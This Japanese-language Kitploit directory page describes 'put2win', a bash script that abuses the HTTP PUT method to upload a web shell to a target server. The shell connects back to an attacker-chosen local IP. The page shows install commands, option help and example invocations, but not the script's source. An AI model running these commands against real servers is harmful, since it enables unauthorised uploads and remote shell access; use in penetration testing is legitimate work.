Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
put2win — PUT HTTPメソッドの悪用を自動化してシェルを取得するスクリプト | Kitploit
ツール/GitHubGitHub/devploit/put2win
エクスプロイトウェブアプリケーション悪用ペネトレーションテストシェルコード生成
GitHubdevploit/put2win

put2win

PUT HTTPメソッドの悪用を自動化してシェルを取得するスクリプト

リポジトリを見る
126286年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

put2win

contributions welcome

PUT HTTPメソッドを悪用してシェルを取得するためのスクリプトです。

asciicast

インストール

root@kitploit:~
git clone https://github.com/sysdevploit/put2win
cd put2win
chmod +x put2win.sh

使用方法

root@kitploit:~
Script to automate PUT HTTP method exploitation to get shell.

Options:
  -t TARGET        Target URL/IP (e.g. 192.168.1.10)
  -p PORT          Target PORT (e.g. 8080)
  -u URL PATH      Path to save the shell (e.g. /uploads)
  -l LOCAL IP      IP where the shell will connect (e.g. 192.168.1.5)
  -s SHELL NAME    Shell name (e.g. license.php)

Examples of use:
 - bash put2win.sh -t 192.168.1.80 -l 192.168.1.10 -s readme.php
 - bash put2win.sh -t 192.168.1.80 -p 443 -u /uploads -l 192.168.1.10

連絡先

Telegram: @devploit

Twitter: @devploit

ツールをダウンロード